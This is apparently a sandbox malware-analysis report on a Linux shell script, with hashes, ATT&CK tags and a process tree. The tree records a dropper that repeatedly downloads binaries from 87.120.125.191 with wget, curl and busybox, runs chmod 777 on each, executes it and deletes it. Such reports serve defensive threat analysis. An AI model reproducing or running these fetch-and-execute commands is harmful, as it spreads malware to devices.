ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2

Analysis

max time kernel
80s
max time network
82s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
20/11/2024, 03:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
Size

10KB
MD5

45b72c6c039a3d67373f15957984b0e7
SHA1

8eb92a8fd6c526682b007d3c8fd7906f1516c6ae
SHA256

ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2
SHA512

d8608a7803cb7783e729069dd99b25a75e4a730d130b624f1cf604a17ac9d1fe65fd00563d154b9c02e552d8c8324832be6cebbbd8c9eb96f4a92cf3959dfd50
SSDEEP

192:mN1RZ53Z5G7VlVNVYTn177f0adFIG6PrPU7FtTlMc2McqMcycXcHcuPbj9lx7x4M:BScGbEdG2d+SXBG2d+S3Z

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
970	chmod
952	chmod
988	chmod
982	chmod
909	chmod
928	chmod
940	chmod
976	chmod
821	chmod
858	chmod
891	chmod
771	chmod
903	chmod
934	chmod
915	chmod
946	chmod
744	chmod
837	chmod
878	chmod
958	chmod
964	chmod
752	chmod
758	chmod
796	chmod
921	chmod
831	chmod
885	chmod
897	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 10 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
894	wget
895	curl
968	curl
969	busybox
972	rm
896	busybox
898	8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
899	rm
967	wget
971	8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	curl
File opened for modification	/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	curl
File opened for modification	/tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq	curl
File opened for modification	/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	curl
File opened for modification	/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu	curl
File opened for modification	/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	curl
File opened for modification	/tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx	curl
File opened for modification	/tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm	curl
File opened for modification	/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	curl
File opened for modification	/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr	curl
File opened for modification	/tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia	curl
File opened for modification	/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	curl
File opened for modification	/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	curl
File opened for modification	/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN	curl
File opened for modification	/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9	curl
File opened for modification	/tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG	curl
File opened for modification	/tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu	curl
File opened for modification	/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	curl
File opened for modification	/tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg	curl
File opened for modification	/tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR	curl
File opened for modification	/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	curl
File opened for modification	/tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr	curl
File opened for modification	/tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN	curl
File opened for modification	/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	curl
File opened for modification	/tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG	curl
File opened for modification	/tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C	curl
File opened for modification	/tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9	curl
File opened for modification	/tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f	curl

/tmp/ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
/tmp/ace71eed8adb4557b81d2f675736af286642900aaed4ecf7da7ca60580c5cab2.sh
1⤵
PID:715
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:719
- /usr/bin/wget
  wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:722
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:729
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:741
- /bin/chmod
  chmod 777 HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  ./HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Executes dropped EXE
  PID:745
- /bin/rm
  rm HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:747
- /usr/bin/wget
  wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:748
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:750
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:751
- /bin/chmod
  chmod 777 EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - File and Directory Permissions Modification
  PID:752
- /tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  ./EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Executes dropped EXE
  PID:753
- /bin/rm
  rm EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:754
- /usr/bin/wget
  wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:755
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:756
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:757
- /bin/chmod
  chmod 777 UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  ./UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Executes dropped EXE
  PID:759
- /bin/rm
  rm UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:761
- /usr/bin/wget
  wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:762
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:763
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:768
- /bin/chmod
  chmod 777 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - File and Directory Permissions Modification
  PID:771
- /tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  ./2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Executes dropped EXE
  PID:773
- /bin/rm
  rm 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:776
- /usr/bin/wget
  wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:778
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:785
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:794
- /bin/chmod
  chmod 777 urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  ./urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Executes dropped EXE
  PID:798
- /bin/rm
  rm urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:801
- /usr/bin/wget
  wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:802
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:808
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:819
- /bin/chmod
  chmod 777 A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - File and Directory Permissions Modification
  PID:821
- /tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  ./A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Executes dropped EXE
  PID:822
- /bin/rm
  rm A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:824
- /usr/bin/wget
  wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:825
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:826
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:830
- /bin/chmod
  chmod 777 I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - File and Directory Permissions Modification
  PID:831
- /tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  ./I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Executes dropped EXE
  PID:832
- /bin/rm
  rm I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:833
- /usr/bin/wget
  wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:834
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:835
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:836
- /bin/chmod
  chmod 777 DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - File and Directory Permissions Modification
  PID:837
- /tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  ./DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Executes dropped EXE
  PID:838
- /bin/rm
  rm DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:841
- /usr/bin/wget
  wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:842
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:847
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:854
- /bin/chmod
  chmod 777 NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - File and Directory Permissions Modification
  PID:858
- /tmp/NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  ./NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  - Executes dropped EXE
  PID:859
- /bin/rm
  rm NuuH4egbHoN0EblePq1zxM0hXJDv7dCuX9
  2⤵
  PID:862
- /usr/bin/wget
  wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:864
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:868
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:875
- /bin/chmod
  chmod 777 FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - File and Directory Permissions Modification
  PID:878
- /tmp/FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  ./FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  - Executes dropped EXE
  PID:880
- /bin/rm
  rm FHCyLVMVYVb40PmGr7srcPQZUPCgpdjVwu
  2⤵
  PID:881
- /usr/bin/wget
  wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:882
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:883
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:884
- /bin/chmod
  chmod 777 c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - File and Directory Permissions Modification
  PID:885
- /tmp/c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  ./c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  - Executes dropped EXE
  PID:886
- /bin/rm
  rm c43WxGhmIc1hpS87hEDiJPZl6ub2mgspRr
  2⤵
  PID:887
- /usr/bin/wget
  wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:888
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:889
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:890
- /bin/chmod
  chmod 777 GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - File and Directory Permissions Modification
  PID:891
- /tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  ./GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Executes dropped EXE
  PID:892
- /bin/rm
  rm GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:893
- /usr/bin/wget
  wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:894
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:895
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:896
- /bin/chmod
  chmod 777 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - File and Directory Permissions Modification
  PID:897
- /tmp/8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  ./8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:898
- /bin/rm
  rm 8FG0S4IpojSiafSerEagdkVvaB7eAJhYwN
  2⤵
  - System Network Configuration Discovery
  PID:899
- /usr/bin/wget
  wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:900
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:901
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:902
- /bin/chmod
  chmod 777 HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - File and Directory Permissions Modification
  PID:903
- /tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  ./HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Executes dropped EXE
  PID:904
- /bin/rm
  rm HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:905
- /usr/bin/wget
  wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:906
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:907
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:908
- /bin/chmod
  chmod 777 HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  ./HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm HiflXDJZPYt9KHCyWrEMgdfAPfXTvuJ27f
  2⤵
  PID:911
- /usr/bin/wget
  wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:912
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:913
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:914
- /bin/chmod
  chmod 777 EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - File and Directory Permissions Modification
  PID:915
- /tmp/EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  ./EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  - Executes dropped EXE
  PID:916
- /bin/rm
  rm EpmNRUgsGmD2gikSj9pSE2172lzpA9VPlx
  2⤵
  PID:917
- /usr/bin/wget
  wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:918
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:919
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:920
- /bin/chmod
  chmod 777 UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - File and Directory Permissions Modification
  PID:921
- /tmp/UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  ./UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  - Executes dropped EXE
  PID:922
- /bin/rm
  rm UUpo7J8vDmfpqIHbnuWLH4Q4uozoqyGZkm
  2⤵
  PID:924
- /usr/bin/wget
  wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:925
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:926
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:927
- /bin/chmod
  chmod 777 HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - File and Directory Permissions Modification
  PID:928
- /tmp/HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  ./HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  - Executes dropped EXE
  PID:929
- /bin/rm
  rm HIIvUaA6Z4crQuxhfkZhvWnvVKDba37GbG
  2⤵
  PID:930
- /usr/bin/wget
  wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:931
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:932
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:933
- /bin/chmod
  chmod 777 I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - File and Directory Permissions Modification
  PID:934
- /tmp/I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  ./I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  - Executes dropped EXE
  PID:935
- /bin/rm
  rm I7WzLNRWPOWL4uF9AKUhvQtpgrcfISdKKg
  2⤵
  PID:936
- /usr/bin/wget
  wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:937
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:938
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:939
- /bin/chmod
  chmod 777 DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - File and Directory Permissions Modification
  PID:940
- /tmp/DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  ./DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  - Executes dropped EXE
  PID:941
- /bin/rm
  rm DZptpa0GYIQdgIRWycrExu9wybkSSjlClq
  2⤵
  PID:942
- /usr/bin/wget
  wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:943
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:944
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:945
- /bin/chmod
  chmod 777 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - File and Directory Permissions Modification
  PID:946
- /tmp/2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  ./2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  - Executes dropped EXE
  PID:947
- /bin/rm
  rm 2GXgnuwE7XjKlmuJvBTlk8tmZ6HgN3yfCG
  2⤵
  PID:948
- /usr/bin/wget
  wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:949
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:950
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:951
- /bin/chmod
  chmod 777 urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - File and Directory Permissions Modification
  PID:952
- /tmp/urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  ./urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  - Executes dropped EXE
  PID:953
- /bin/rm
  rm urvi9pQkJFO7gVaPETC21qnb4Cyu7jCPia
  2⤵
  PID:954
- /usr/bin/wget
  wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:955
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:956
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:957
- /bin/chmod
  chmod 777 A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - File and Directory Permissions Modification
  PID:958
- /tmp/A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  ./A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  - Executes dropped EXE
  PID:959
- /bin/rm
  rm A0Z9z4w3pr7lHxNtOq0DZTuG9d5iNFoa1C
  2⤵
  PID:960
- /usr/bin/wget
  wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:961
- /usr/bin/curl
  curl -O http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:962
- /bin/busybox
  /bin/busybox wget http://87.120.125.191/bins/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:963
- /bin/chmod
  chmod 777 GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - File and Directory Permissions Modification
  PID:964
- /tmp/GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  ./GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  - Executes dropped EXE
  PID:965
- /bin/rm
  rm GD5RSyw9Z75bFWBmJLFhaRx2DAqezYQLvR
  2⤵
  PID:966
